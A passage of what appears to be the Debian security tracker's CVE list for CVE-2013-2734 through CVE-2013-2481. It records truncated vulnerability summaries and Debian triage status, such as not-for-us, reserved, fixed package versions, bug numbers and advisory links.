	NOT-FOR-US: Adobe Reader
CVE-2013-2734 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2733 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2732 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2731 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2730 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2729 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2728 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-2727 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2726 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2725 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2724 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2723 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2722 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2721 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2720 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2719 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2718 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2717 (Multiple unspecified vulnerabilities in the System Management (aka Sys ...)
	NOT-FOR-US: EMC
CVE-2013-2716 (Puppet Labs Puppet Enterprise before 2.8.0 does not use a "randomized ...)
	NOT-FOR-US: Puppet Labs Puppet Enterprise
CVE-2013-2715 (Cross-site scripting (XSS) vulnerability in the admin view in the Sear ...)
	NOT-FOR-US: Drupal module search_api
CVE-2013-2714 (Cross-site Scripting (XSS) in WordPress podPress Plugin 8.8.10.13 coul ...)
	NOT-FOR-US: WordPress podPress Plugin
CVE-2013-2713 (Cross-site request forgery (CSRF) vulnerability in users_maint.html in ...)
	NOT-FOR-US: KrisonAV
CVE-2013-2712 (Cross-site scripting (XSS) vulnerability in services/get_article.php i ...)
	NOT-FOR-US: KrisonAV
CVE-2013-2711 RESERVED
CVE-2013-2710 (Cross-site request forgery (CSRF) vulnerability in the Contextual Rela ...)
	NOT-FOR-US: WordPress plugin Contextual Related Posts
CVE-2013-2709 (Cross-site request forgery (CSRF) vulnerability in the FourSquare Chec ...)
	NOT-FOR-US: WordPress plugin FourSquare Checkins
CVE-2013-2708 (Cross-site request forgery (CSRF) vulnerability in the Content Slide p ...)
	NOT-FOR-US: WordPress plugin Content Slide
CVE-2013-2707 (Cross-site request forgery (CSRF) vulnerability in the Login With Ajax ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-2706 (Cross-site request forgery (CSRF) vulnerability in the Stream Video Pl ...)
	NOT-FOR-US: WordPress plugin Stream Video Player
CVE-2013-2705 (Cross-site request forgery (CSRF) vulnerability in the WordPress Simpl ...)
	NOT-FOR-US: WordPress plugin Simple Paypal Shopping Cart
CVE-2013-2704 (Cross-site request forgery (CSRF) vulnerability in the Dropdown Menu W ...)
	NOT-FOR-US: WordPress plugin Dropdown Menu Widget
CVE-2013-2703 (Cross-site request forgery (CSRF) vulnerability in the Facebook Member ...)
	NOT-FOR-US: Facebook Members plugin for WordPress
CVE-2013-2702 (Cross-site request forgery (CSRF) vulnerability in the Easy AdSense Li ...)
	NOT-FOR-US: Easy AdSense Lite plugin for WordPress
CVE-2013-2701 (Cross-site request forgery (CSRF) vulnerability in the Social Sharing ...)
	NOT-FOR-US: social sharing toolkit plugin for wp
CVE-2013-2700 (Cross-site request forgery (CSRF) vulnerability in the Add/Edit page ( ...)
	NOT-FOR-US: WordPress plugin WP125
CVE-2013-2699 (Cross-site request forgery (CSRF) vulnerability in the underConstructi ...)
	NOT-FOR-US: WordPress plugin underConstruction
CVE-2013-2698 (Cross-site request forgery (CSRF) vulnerability in the Calendar plugin ...)
	NOT-FOR-US: WordPress plugin calendar
CVE-2013-2697 (Cross-site request forgery (CSRF) vulnerability in the WP-DownloadMana ...)
	NOT-FOR-US: Wordpress plugin Downloadmanager
CVE-2013-2696 (Cross-site request forgery (CSRF) vulnerability in the All in One Webm ...)
	NOT-FOR-US: WordPress plugin All in One Webmaster
CVE-2013-2695 (Cross-site scripting (XSS) vulnerability in invite.php in the WP Sympo ...)
	NOT-FOR-US: WordPress plugin wp-symposium
CVE-2013-2694 (Open redirect vulnerability in invite.php in the WP Symposium plugin 1 ...)
	NOT-FOR-US: WordPress plugin wp-symposium
CVE-2013-2693 (Cross-site request forgery (CSRF) vulnerability in the Options in the ...)
	NOT-FOR-US: WordPress plugin WP-Print
CVE-2013-2692 (Cross-site request forgery (CSRF) vulnerability in the Admin web inter ...)
	NOT-FOR-US: OpenVPN Access Server
CVE-2013-2691 (Stack-based buffer overflow in the JetMPG.ax module in jetAudio 8.0.17 ...)
	NOT-FOR-US: jetAudio
CVE-2013-2690 (SQL injection vulnerability in index.php in Synchroweb Technology SynC ...)
	NOT-FOR-US: Synchroweb Technology SynConnect 2.0
CVE-2013-2689 RESERVED
CVE-2013-2688 (Buffer overflow in phrelay in BlackBerry QNX Neutrino RTOS through 6.5 ...)
	NOT-FOR-US: QNX Software Development Platform
CVE-2013-2687 (Stack-based buffer overflow in the bpe_decompress function in (1) Blac ...)
	NOT-FOR-US: QNX
CVE-2013-2686 (main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1. ...)
	- asterisk 1:1.8.13.1~dfsg-2 (bug #704114)
	[squeeze] - asterisk (httpd code does not read HTTP POST variables)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20967
CVE-2013-2685 (Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk ...)
	- asterisk (H264 code not yet present)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20901
CVE-2013-2684 (Cross-site Scripting (XSS) in Cisco Linksys E4200 1.0.05 Build 7 devic ...)
	NOT-FOR-US: Cisco
CVE-2013-2683 (Cisco Linksys E4200 1.0.05 Build 7 devices contain an Information Disc ...)
	NOT-FOR-US: Cisco
CVE-2013-2682 (Cisco Linksys E4200 1.0.05 Build 7 devices contain a Clickjacking Vuln ...)
	NOT-FOR-US: Cisco
CVE-2013-2681 (Cisco Linksys E4200 1.0.05 Build 7 devices contain a Security Bypass V ...)
	NOT-FOR-US: Cisco
CVE-2013-2680 (Cisco Linksys E4200 1.0.05 Build 7 devices store passwords in cleartex ...)
	NOT-FOR-US: Cisco
CVE-2013-2679 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E ...)
	NOT-FOR-US: Cisco
CVE-2013-2678 (Cisco Linksys E4200 1.0.05 Build 7 routers contain a Local File Includ ...)
	NOT-FOR-US: Cisco
CVE-2013-2677 RESERVED
CVE-2013-2676 (Brother MFC-9970CDW 1.10 firmware L devices contain an information dis ...)
	NOT-FOR-US: Brother
CVE-2013-2675 (Brother MFC-9970CDW 1.10 devices with Firmware L contain a Frameable r ...)
	NOT-FOR-US: Brother devices
CVE-2013-2674 (Brother MFC-9970CDW 1.10 firmware L devices contain an information dis ...)
	NOT-FOR-US: Brother MFC-9970CDW 1.10 firmware L devices
CVE-2013-2673 (Brother MFC-9970CDW 1.10 firmware L devices contain a security bypass ...)
	NOT-FOR-US: Brother MFC-9970CDW 1.10 firmware L devices
CVE-2013-2672 (Brother MFC-9970CDW devices with firmware 0D allow cleartext submissio ...)
	NOT-FOR-US: Brother MFC-9970CDW devices
CVE-2013-2671 (Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC ...)
	NOT-FOR-US: Brother printer
CVE-2013-2670 (Cross-site scripting (XSS) vulnerability in the Brother MFC-9970CDW pr ...)
	NOT-FOR-US: Brother printer
CVE-2013-2669 RESERVED
CVE-2013-2668 RESERVED
CVE-2013-2667 RESERVED
CVE-2013-2666 RESERVED
CVE-2013-2665 RESERVED
CVE-2013-2664 RESERVED
CVE-2013-2663 RESERVED
CVE-2013-2662 RESERVED
CVE-2013-2661 RESERVED
CVE-2013-2660 RESERVED
CVE-2013-2659 RESERVED
CVE-2013-2658 RESERVED
CVE-2013-2657 RESERVED
CVE-2013-2656 RESERVED
CVE-2013-2655 RESERVED
CVE-2013-2654 RESERVED
CVE-2013-2653 (security/MemberLoginForm.php in SilverStripe 3.0.3 supports login usin ...)
	- silverstripe (bug #528461)
CVE-2013-2652 (CRLF injection vulnerability in help/help_language.php in WebCollab 3. ...)
	NOT-FOR-US: WebCollab
CVE-2013-2651 (Multiple cross-site scripting (XSS) vulnerabilities in BoltWire 3.5 an ...)
	NOT-FOR-US: Boltwire
CVE-2013-2650 RESERVED
CVE-2013-2649 RESERVED
CVE-2013-2648 RESERVED
CVE-2013-2647 RESERVED
CVE-2013-2646 (TP-LINK TL-WR1043ND V1_120405 devices contain an unspecified denial of ...)
	NOT-FOR-US: TP-LINK
CVE-2013-2645 (Multiple cross-site request forgery (CSRF) vulnerabilities on the TP-L ...)
	NOT-FOR-US: TP-LINK Router
CVE-2013-2644 REJECTED
CVE-2013-2643 (Multiple cross-site scripting (XSS) vulnerabilities in Sophos Web Appl ...)
	NOT-FOR-US: Sophos Web Appliance
CVE-2013-2642 (Sophos Web Appliance before 3.7.8.2 allows (1) remote attackers to exe ...)
	NOT-FOR-US: Sophos Web Appliance
CVE-2013-2641 (Directory traversal vulnerability in patience.cgi in Sophos Web Applia ...)
	NOT-FOR-US: Sophos Web Appliance
CVE-2013-2640 (ajax.functions.php in the MailUp plugin before 1.3.2 for WordPress doe ...)
	NOT-FOR-US: MailUp plugin for Wordpress
CVE-2013-2639 (Cross-site scripting (XSS) vulnerability in CTERA Cloud Storage OS bef ...)
	NOT-FOR-US: CTERA Cloud Storage OS
CVE-2013-2638 RESERVED
CVE-2013-2637 (A Cross-Site Scripting (XSS) Vulnerability exists in OTRS ITSM prior t ...)
	NOT-FOR-US: OTRS ITSM and OTRS FAQ
CVE-2013-2636 (net/bridge/br_mdb.c in the Linux kernel before 3.8.4 does not initiali ...)
	- linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-2635 (The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux ker ...)
	- linux 3.2.41-2
	- linux-2.6
	[squeeze] - linux-2.6 (Introduced in 2.6.34)
CVE-2013-2634 (net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize c ...)
	{DSA-2668-1}
	- linux 3.2.41-2
	- linux-2.6
CVE-2013-2633 (Piwik before 1.11 accepts input from a POST request instead of a GET r ...)
	- piwik (bug #506933)
CVE-2013-2632 (Google V8 before 3.17.13, as used in Google Chrome before 27.0.1444.3, ...)
	- libv8
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-2631 (TinyWebGallery (TWG) 1.8.9 and earlier contains a full path disclosure ...)
	NOT-FOR-US: TinyWebGallery
CVE-2013-2630 (Cross-site scripting (XSS) vulnerability in CA Service Desk Manager 12 ...)
	NOT-FOR-US: CA Service Desk Manager
CVE-2013-2629 (Leed (Light Feed), possibly before 1.5 Stable, allows remote attackers ...)
	NOT-FOR-US: Leed
CVE-2013-2628 (Multiple cross-site request forgery (CSRF) vulnerabilities in action.p ...)
	NOT-FOR-US: Leed
CVE-2013-2627 (SQL injection vulnerability in action.php in Leed (Light Feed), possib ...)
	NOT-FOR-US: Leed
CVE-2013-2626 RESERVED
CVE-2013-2625 (An Access Bypass issue exists in OTRS Help Desk before 3.2.4, 3.1.14, ...)
	- otrs2 3.1.7+dfsg1-8
	[squeeze] - otrs2 2.4.9+dfsg1-3+squeeze4
	NOTE: DSA-2733-1
	NOTE: http://web.archive.org/web/20130716120019/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-01/
CVE-2013-2624 (Telean before 1.3.1 contains a full path disclosure vulnerability whic ...)
	NOT-FOR-US: Telean
CVE-2013-2623 (Cross-site Scripting (XSS) in Telaen before 1.3.1 allows remote attack ...)
	NOT-FOR-US: Uebimiau Webmail
CVE-2013-2622 (Cross-site Scripting (XSS) in UebiMiau 2.7.11 and earlier allows remot ...)
	NOT-FOR-US: Uebimiau Webmail
CVE-2013-2621 (Open Redirection Vulnerability in the redir.php script in Telaen befor ...)
	NOT-FOR-US: Uebimiau Webmail
CVE-2013-2620 RESERVED
CVE-2013-2619 (Directory traversal vulnerability in Aspen before 0.22 allows remote a ...)
	NOT-FOR-US: Aspen
CVE-2013-2618 (Cross-site scripting (XSS) vulnerability in editor.php in Network Weat ...)
	NOT-FOR-US: Network Weathermap
CVE-2013-2617 (lib/curl.rb in the Curl Gem for Ruby allows remote attackers to execut ...)
	NOT-FOR-US: Ruby Curl gem
CVE-2013-2616 (lib/mini_magick.rb in the MiniMagick Gem 1.3.1 for Ruby allows remote ...)
	NOT-FOR-US: Ruby MiniMagick gem
CVE-2013-2615 (lib/entry_controller.rb in the fastreader Gem 1.0.8 for Ruby allows re ...)
	NOT-FOR-US: Ruby fastreader gem
CVE-2013-2614 RESERVED
CVE-2013-2613 RESERVED
CVE-2013-2612 (Command-injection vulnerability in Huawei E587 3G Mobile Hotspot 11.20 ...)
	NOT-FOR-US: Huawei
CVE-2013-2611 RESERVED
CVE-2013-2610 RESERVED
CVE-2013-2609 RESERVED
CVE-2013-2608 RESERVED
CVE-2013-2607 RESERVED
CVE-2013-2606 RESERVED
CVE-2013-2605 RESERVED
CVE-2013-2604 (RealNetworks GameHouse RealArcade Installer (aka ActiveMARK Game Insta ...)
	NOT-FOR-US: RealNetworks GameHouse RealArcade Installer
CVE-2013-2603 (The RACInstaller.StateCtrl.1 ActiveX control in InstallerDlg.dll in Re ...)
	NOT-FOR-US: RealNetworks GameHouse RealArcade Installer
CVE-2013-2602 (Multiple array index errors in the MyHeritage SEQueryObject ActiveX co ...)
	NOT-FOR-US: MyHeritage SEQueryObject ActiveX control
CVE-2013-2601 (The NDVM in Citrix XenClient XT before 2.1.3 and 3.x before 3.1.4 allo ...)
	NOT-FOR-US: Citrix XenClient XT
CVE-2013-2600 (MiniUPnPd has information disclosure use of snprintf() ...)
	- miniupnpd 1.8.20130730-1 (bug #716936)
CVE-2013-2599 (A certain Qualcomm Innovation Center (QuIC) patch to the NativeDaemonC ...)
	NOT-FOR-US: Qualcomm (Android)
CVE-2013-2598 (app/aboot/aboot.c in the Little Kernel (LK) bootloader, as distributed ...)
	NOT-FOR-US: Little Kernel (bootloader)
CVE-2013-2597 (Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c ...)
	NOT-FOR-US: Android Linux kernel (affects {sound/soc/,arch/arm/mach-}msm/qdsp6v2)
	NOTE: https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597
CVE-2013-2596 (Integer overflow in the fb_mmap function in drivers/video/fbmem.c in t ...)
	- linux 3.9-1
	[wheezy] - linux 3.2.46-1
	NOTE: the issue comes from fbmem code from linux mainline, the exploit was just targeting motorola
	NOTE: phones that ship code that is based on the original linux code, but both are affected.
	NOTE: an exploit needs access to /dev/fb0 which is not world readable/writable on Debian
CVE-2013-2595 (The device-initialization functionality in the MSM camera driver for t ...)
	NOT-FOR-US: Qualcomm MSM Camera driver
CVE-2013-2594 (SQL injection vulnerability in reports/calldiary.php in Hornbill Suppo ...)
	NOT-FOR-US: Supportworks ITSM
CVE-2013-2593
	RESERVED
CVE-2013-2592
	RESERVED
CVE-2013-2591
	RESERVED
CVE-2013-2590
	RESERVED
CVE-2013-2589
	RESERVED
CVE-2013-2588
	RESERVED
CVE-2013-2587
	RESERVED
CVE-2013-2586 (XAMPP 1.8.1 does not properly restrict access to xampp/lang.php, which ...)
	NOT-FOR-US: XAMPP
CVE-2013-2585 (Cross-site scripting (XSS) vulnerability in Atmail Webmail Server 6.6. ...)
	- atmailopen
CVE-2013-2584
	RESERVED
CVE-2013-2583 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-2582 (CRLF injection vulnerability in the redirect servlet in Open-Xchange A ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-2581 (cgi-bin/firmwareupgrade in TP-Link IP Cameras TL-SC3130, TL-SC3130G, T ...)
	NOT-FOR-US: TP-Link IP Cameras
CVE-2013-2580 (Unrestricted file upload vulnerability in cgi-bin/uploadfile in TP-Lin ...)
	NOT-FOR-US: TP-Link IP Cameras
CVE-2013-2579 (TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and p ...)
	NOT-FOR-US: TP-Link IP Cameras
CVE-2013-2578 (cgi-bin/admin/servetest in TP-Link IP Cameras TL-SC3130, TL-SC3130G, T ...)
	NOT-FOR-US: TP-Link IP Cameras
CVE-2013-2577 (Buffer overflow in XnView before 2.04 allows remote attackers to execu ...)
	NOT-FOR-US: XnView
CVE-2013-2576 (Buffer overflow in Artweaver before 3.1.6 allows remote attackers to c ...)
	NOT-FOR-US: Artweaver
CVE-2013-2575
	RESERVED
CVE-2013-2574 (An Access vulnerability exists in FOSCAM IP Camera FI8620 due to insuf ...)
	NOT-FOR-US: Foscam
CVE-2013-2573 (A Command Injection vulnerability exists in the ap parameter to the /c ...)
	NOT-FOR-US: TP-Link
CVE-2013-2572 (A Security Bypass vulnerability exists in TP-LINK IP Cameras TL-SC 313 ...)
	NOT-FOR-US: TP-Link
CVE-2013-2571 (Iris 3.8 before build 1548, as used in Xpient point of sale (POS) syst ...)
	NOT-FOR-US: Xpient point of sale (POS)
CVE-2013-2570 (A Command Injection vulnerability exists in Zavio IP Cameras through 1 ...)
	NOT-FOR-US: Zavio
CVE-2013-2569 (A Security Bypass vulnerability exists in Zavio IP Cameras through 1.6 ...)
	NOT-FOR-US: Zavio
CVE-2013-2568 (A Command Injection vulnerability exists in Zavio IP Cameras through 1 ...)
	NOT-FOR-US: Zavio
CVE-2013-2567 (An Authentication Bypass vulnerability exists in the web interface in ...)
	NOT-FOR-US: Zavio
CVE-2013-2566 (The RC4 algorithm, as used in the TLS protocol and SSL protocol, has m ...)
	NOTE: Generic protocol flaw in RC4
CVE-2013-2565 (A vulnerability in Mambo CMS v4.6.5 where the scripts thumbs.php, edit ...)
	NOT-FOR-US: Mambo CMS
CVE-2013-2564 (Mambo CMS 4.6.5 allows remote attackers to cause a denial of service ( ...)
	NOT-FOR-US: Mambo CMS
CVE-2013-2563 (Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, ...)
	NOT-FOR-US: Mambo CMS
CVE-2013-2562 (Mambo CMS 4.6.5 stores the MySQL database password in cleartext in the ...)
	NOT-FOR-US: Mambo CMS
CVE-2013-2561 (OpenFabrics ibutils 1.5.7 allows local users to overwrite arbitrary fi ...)
	- ibutils 1.5.7-2 (low; bug #704063)
	[squeeze] - ibutils (Minor issue)
	[wheezy] - ibutils (Minor issue)
CVE-2013-2560 (Directory traversal vulnerability in the web interface on Foscam devic ...)
	NOT-FOR-US: Foscam
CVE-2013-2559 (SQL injection vulnerability in Symphony CMS before 2.3.2 allows remote ...)
	NOT-FOR-US: Symphony CMS
CVE-2013-2558 (Unspecified vulnerability in Microsoft Windows 8 allows remote attacke ...)
	NOT-FOR-US: Windows 8
CVE-2013-2557 (The sandbox protection mechanism in Microsoft Internet Explorer 9 allo ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2556 (Unspecified vulnerability in Microsoft Windows Vista SP2, Windows Serv ...)
	NOT-FOR-US: Windows 7
CVE-2013-2555 (Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x bef ...)
	NOT-FOR-US: Adobe Flash plugin
CVE-2013-2554 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to b ...)
	NOT-FOR-US: Windows 7
CVE-2013-2553 (Unspecified vulnerability in the kernel in Microsoft Windows 7 allows ...)
	NOT-FOR-US: Windows 7
CVE-2013-2552 (Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2551 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2550 (Unspecified vulnerability in Adobe Reader 11.0.02 allows attackers to ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2549 (Unspecified vulnerability in Adobe Reader 11.0.02 allows remote attack ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2548 (The crypto_report_one function in crypto/crypto_user.c in the report A ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2547 (The crypto_report_one function in crypto/crypto_user.c in the report A ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2546 (The report API in the crypto user configuration API in the Linux kerne ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2545
	RESERVED
CVE-2013-2544
	RESERVED
CVE-2013-2543
	RESERVED
CVE-2013-2542
	RESERVED
CVE-2013-2541
	RESERVED
CVE-2013-2540
	RESERVED
CVE-2013-2539
	RESERVED
CVE-2013-2538
	RESERVED
CVE-2013-2537
	RESERVED
CVE-2013-2536
	RESERVED
CVE-2013-2535
	RESERVED
CVE-2013-2534
	RESERVED
CVE-2013-2533
	RESERVED
CVE-2013-2532
	RESERVED
CVE-2013-2531
	RESERVED
CVE-2013-2530
	RESERVED
CVE-2013-2529
	RESERVED
CVE-2013-2528
	RESERVED
CVE-2013-2527
	RESERVED
CVE-2013-2526
	RESERVED
CVE-2013-2525
	RESERVED
CVE-2013-2524
	RESERVED
CVE-2013-2523
	RESERVED
CVE-2013-2522
	RESERVED
CVE-2013-2521
	RESERVED
CVE-2013-2520
	RESERVED
CVE-2013-2519
	RESERVED
CVE-2013-2518
	REJECTED
CVE-2013-2517
	REJECTED
CVE-2013-2516 (Vulnerability in FileUtils v0.7, Ruby Gem Fileutils <= v0.7 Command ...)
	- ruby-fileutils (bug #900515)
CVE-2013-2515
	RESERVED
CVE-2013-2514
	RESERVED
CVE-2013-2513
	RESERVED
CVE-2013-2512 (The ftpd gem 0.2.1 for Ruby allows remote attackers to execute arbitra ...)
	NOT-FOR-US: Ruby ftpd gem
CVE-2013-2511
	RESERVED
CVE-2013-2510
	RESERVED
CVE-2013-2509
	RESERVED
CVE-2013-2508
	RESERVED
CVE-2013-2507 (Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC ...)
	NOT-FOR-US: Brother
CVE-2013-2506 (app/models/spree/user.rb in spree_auth_devise in Spree 1.1.x before 1. ...)
	NOT-FOR-US: Spree
CVE-2013-2505
	RESERVED
CVE-2013-2504 (Cross-site scripting (XSS) vulnerability in SPS/Portal/default.aspx in ...)
	NOT-FOR-US: Matrix42 Service Store
CVE-2013-2503 (Privoxy before 3.0.21 does not properly handle Proxy-Authenticate and ...)
	- privoxy 3.0.21-1 (low; bug #702896)
	[wheezy] - privoxy (Minor issue)
	[squeeze] - privoxy (Minor issue)
	NOTE: http://blog.c22.cc/2013/03/11/privoxy-proxy-authentication-credential-exposure-cve-2013-2503/
	NOTE: http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup
CVE-2013-2502
	RESERVED
CVE-2013-2501 (Cross-site scripting (XSS) vulnerability in the Terillion Reviews plug ...)
	NOT-FOR-US: Terillion Reviews plugin for Wordpress
CVE-2013-2500
	RESERVED
CVE-2013-2499 (SimpleHRM 2.3 and earlier could allow remote attackers to bypass the a ...)
	NOT-FOR-US: SimpleHRM
CVE-2013-2498 (SQL injection vulnerability in the login page in flexycms/modules/user ...)
	NOT-FOR-US: SimpleHRM
CVE-2013-2497
	RESERVED
CVE-2013-2496 (The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FF ...)
	- libav 6:0.8.6-1 (bug #703200)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
CVE-2013-2495 (The iff_read_header function in iff.c in libavformat in FFmpeg through ...)
	- libav 6:0.8.6-1 (bug #703200)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
CVE-2013-2494 (libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to ...)
	- isc-dhcp 4.2.4-6 (low; bug #704426)
	[wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u6
	[squeeze] - isc-dhcp (Only affects 4.2.x)
CVE-2013-2493 (The Hook_Terminate function in chrome_frame/protocol_sink_wrap.cc in t ...)
	NOT-FOR-US: Google Chrome Frame plugin for Internet Explorer
CVE-2013-2492 (Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 185 ...)
	{DSA-2648-1 DSA-2647-1}
	- firebird2.1 (bug #702735)
	- firebird2.5 2.5.2~svn+54698.ds4-2 (bug #702736)
	NOTE: http://tracker.firebirdsql.org/browse/CORE-4058
CVE-2013-2491
	RESERVED
CVE-2013-2490
	RESERVED
CVE-2013-2489
	RESERVED
CVE-2013-2488 (The DTLS dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-22.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8380
	NOTE: Versions affected: 1.8.0 to 1.8.X, 1.6.0 to 1.6.X
CVE-2013-2487 (epan/dissectors/packet-reload.c in the REsource LOcation And Discovery ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only 1.8.x series)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2486 (The dissect_diagnosticrequest function in epan/dissectors/packet-reloa ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only 1.8.x series)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2485 (The FCSP dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-20.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8359
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2484 (The CIMD dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-19.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8346
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2483 (The acn_add_dmp_data function in epan/dissectors/packet-acn.c in the A ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-18.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8340
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2482 (The AMPQ dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before 1 ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-17.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8337
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2481 (Integer signedness error in the dissect_mount_dirpath_call function in ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-16.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8335
